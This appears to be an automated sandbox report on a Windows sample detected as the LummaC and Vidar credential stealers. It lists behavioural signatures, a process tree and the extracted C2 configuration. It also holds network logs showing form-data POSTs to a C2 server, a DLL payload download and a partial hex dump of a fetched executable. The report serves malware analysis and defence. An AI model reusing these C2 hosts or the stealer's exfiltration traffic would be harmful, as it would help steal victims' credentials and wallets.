Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1514409
MD5:	6b082832f014548bf1703ddaed1e16b9
SHA1:	93d4d923d2dc2869e7aeb8cf919490087113b838
SHA256:	036fc1946493ce413024f5b8094bddc99f2a22e0e31ff93b63015b020cbff0e6
Tags:	exe
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6B082832F014548BF1703DDAED1E16B9)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

BAAEHDBFID.exe (PID: 8100 cmdline: "C:\ProgramData\BAAEHDBFID.exe" MD5: 384A847AD2833788FA253433FD2EEA8D)

conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 8184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 7196 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HDAFIIDAKJDG" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 2504 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["puredoffustow.shop", "chickerkuso.shop", "quotamkdsdqo.shop", "metallygaricwo.shop", "milldymarskwom.shop", "carrtychaintnyw.shop", "questionmwq.shop", "opponnentduei.shop", "achievenmtynwjq.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "dea7c01007a657ba0c601c941632f140"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7412	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7412	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7412	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7516	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7516	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7516	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7516	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.RegAsm.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3a05570.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3a05570.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3a05570.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3a05570.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:07:25.933762+0200	2028765	3	Unknown Traffic	192.168.2.4	49738	116.203.165.127	443	TCP
2024-09-20T11:07:27.086417+0200	2028765	3	Unknown Traffic	192.168.2.4	49739	116.203.165.127	443	TCP
2024-09-20T11:07:28.455913+0200	2028765	3	Unknown Traffic	192.168.2.4	49740	116.203.165.127	443	TCP
2024-09-20T11:07:29.814677+0200	2028765	3	Unknown Traffic	192.168.2.4	49741	116.203.165.127	443	TCP
2024-09-20T11:07:31.172777+0200	2028765	3	Unknown Traffic	192.168.2.4	49742	116.203.165.127	443	TCP
2024-09-20T11:07:32.592621+0200	2028765	3	Unknown Traffic	192.168.2.4	49743	116.203.165.127	443	TCP
2024-09-20T11:07:33.700459+0200	2028765	3	Unknown Traffic	192.168.2.4	49744	116.203.165.127	443	TCP
2024-09-20T11:07:36.790169+0200	2028765	3	Unknown Traffic	192.168.2.4	49745	116.203.165.127	443	TCP
2024-09-20T11:07:38.297862+0200	2028765	3	Unknown Traffic	192.168.2.4	49746	116.203.165.127	443	TCP
2024-09-20T11:07:39.454980+0200	2028765	3	Unknown Traffic	192.168.2.4	49747	116.203.165.127	443	TCP
2024-09-20T11:07:40.560393+0200	2028765	3	Unknown Traffic	192.168.2.4	49748	116.203.165.127	443	TCP
2024-09-20T11:07:41.501794+0200	2028765	3	Unknown Traffic	192.168.2.4	49749	116.203.165.127	443	TCP
2024-09-20T11:07:43.229454+0200	2028765	3	Unknown Traffic	192.168.2.4	49750	116.203.165.127	443	TCP
2024-09-20T11:07:44.932774+0200	2028765	3	Unknown Traffic	192.168.2.4	49751	116.203.165.127	443	TCP
2024-09-20T11:07:46.482079+0200	2028765	3	Unknown Traffic	192.168.2.4	49752	116.203.165.127	443	TCP
2024-09-20T11:07:47.900520+0200	2028765	3	Unknown Traffic	192.168.2.4	49753	116.203.165.127	443	TCP
2024-09-20T11:07:49.153157+0200	2028765	3	Unknown Traffic	192.168.2.4	49754	116.203.165.127	443	TCP
2024-09-20T11:07:52.144396+0200	2028765	3	Unknown Traffic	192.168.2.4	49755	116.203.165.127	443	TCP
2024-09-20T11:07:53.384680+0200	2028765	3	Unknown Traffic	192.168.2.4	49756	116.203.165.127	443	TCP
2024-09-20T11:07:54.725760+0200	2028765	3	Unknown Traffic	192.168.2.4	49757	116.203.165.127	443	TCP
2024-09-20T11:07:56.111092+0200	2028765	3	Unknown Traffic	192.168.2.4	49758	116.203.165.127	443	TCP
2024-09-20T11:07:58.156199+0200	2028765	3	Unknown Traffic	192.168.2.4	49760	116.203.165.127	443	TCP
2024-09-20T11:08:00.161642+0200	2028765	3	Unknown Traffic	192.168.2.4	49761	116.203.165.127	443	TCP
2024-09-20T11:08:02.908676+0200	2028765	3	Unknown Traffic	192.168.2.4	49763	116.203.165.127	443	TCP
2024-09-20T11:08:04.516344+0200	2028765	3	Unknown Traffic	192.168.2.4	49765	116.203.165.127	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:08:04.471344+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49764	172.67.204.62	443	TCP
2024-09-20T11:08:05.439011+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49766	104.21.88.61	443	TCP
2024-09-20T11:08:06.347042+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-20T11:08:07.321284+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49770	188.114.97.3	443	TCP
2024-09-20T11:08:08.236847+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-20T11:08:09.366336+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49772	104.21.75.242	443	TCP
2024-09-20T11:08:10.276797+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49773	188.114.96.3	443	TCP
2024-09-20T11:08:11.178841+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49774	188.114.96.3	443	TCP
2024-09-20T11:08:12.104621+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49775	172.67.192.105	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:08:04.471344+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49764	172.67.204.62	443	TCP
2024-09-20T11:08:05.439011+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49766	104.21.88.61	443	TCP
2024-09-20T11:08:06.347042+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49768	188.114.97.3	443	TCP
2024-09-20T11:08:07.321284+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49770	188.114.97.3	443	TCP
2024-09-20T11:08:08.236847+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-20T11:08:09.366336+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49772	104.21.75.242	443	TCP
2024-09-20T11:08:10.276797+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49773	188.114.96.3	443	TCP
2024-09-20T11:08:11.178841+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49774	188.114.96.3	443	TCP
2024-09-20T11:08:12.104621+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49775	172.67.192.105	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:08:05.990808+0200	2054495	1	A Network Trojan was detected	192.168.2.4	49767	45.132.206.251	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:07:30.519925+0200	2044247	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.4	49741	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:07:31.853484+0200	2051831	1	Malware Command and Control Activity Detected	116.203.165.127	443	192.168.2.4	49742	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:07:30.519693+0200	2049087	1	A Network Trojan was detected	192.168.2.4	49741	116.203.165.127	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-20T11:08:01.565896+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49762	147.45.44.104	80	TCP

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 20 Sep 2024 09:08:01 GMTContent-Type: application/octet-streamContent-Length: 363424Last-Modified: Thu, 19 Sep 2024 23:31:32 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ecb454-58ba0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 31 05 00 00 20 00 00 00 32 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 60 05 00 00 06 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 05 00 00 02 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 51 05 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 41 05 00 14 0e 00 00 03 00 02 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 4f 10 e0 7a 9d 12 3f 5a cb c3 23 e8 83 85 c0 ee 62 e2 17 74 b1 48 16 78 4b 84 98 93 07 c0 f7 fd 2b f2 05 10 2c b9 ae bc 35 37 b0 87 15 04 3e 31 8d 47 32 e9 25 6a f5 ff cb 16 fe 05 c0 75 f2 b8 2d 94 45 c7 b7 6d 52 9a 55 86 1b dd f8 2d 36 57 c8 34 9c 62 57 b2 ae af 35 e3 3e 42 a1 07 08 5d d3 a7 7f 20 04 e2 85 b0 73 b6 c3 66 15 27 af 28 6f b6 fd c7 7d bf e1 bd 6b bc 50 fd e5 71 3e 6a 92 ca 8e e4 5d 5b 54 ab 07 91 c6 db 0c a0 87 2e c4 c8 f9 a5 d1 73 8a 70 7d 48 54 2d 6f 38 2e 8c 1c 07 f1 5e 9a 9f 94 d0 05 70 0f b0 b2 7f d5 4b 37 3f c3 6e 89 74 45 4b 3e 5e e5 8c 38 1c 70 b8 d1 82 cc a5 db f1 2b a0 62 57 8c f6 ee 8b 7b 3a 53 ad b9 fc 6a c7 05 0f 5a 0f ea ae d0 a3 dc 8f b9 aa 7a 8f 64 32 e3 69 c2 a4 e3 ad f4 ee a7 36 35 b9 75 0a 7c bf 76 55 79 31 b8 01 ae f8 23 36 9e eb 08 f1 0f 12 50 14 b7 92 7d f7 24 04 de 8a 4b bf 86 5c 58 d6 a2 f3 fb 12 24 b4 d2 5a db 44 0d fd d2 f6 58 12 d7 71 8f 4b 85 5e 0

Source: global traffic

HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 172.67.192.105 172.67.192.105
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49738 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49739 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49760 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49762 -> 147.45.44.104:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGCFCAFIIEBGCBFCAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 7741Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
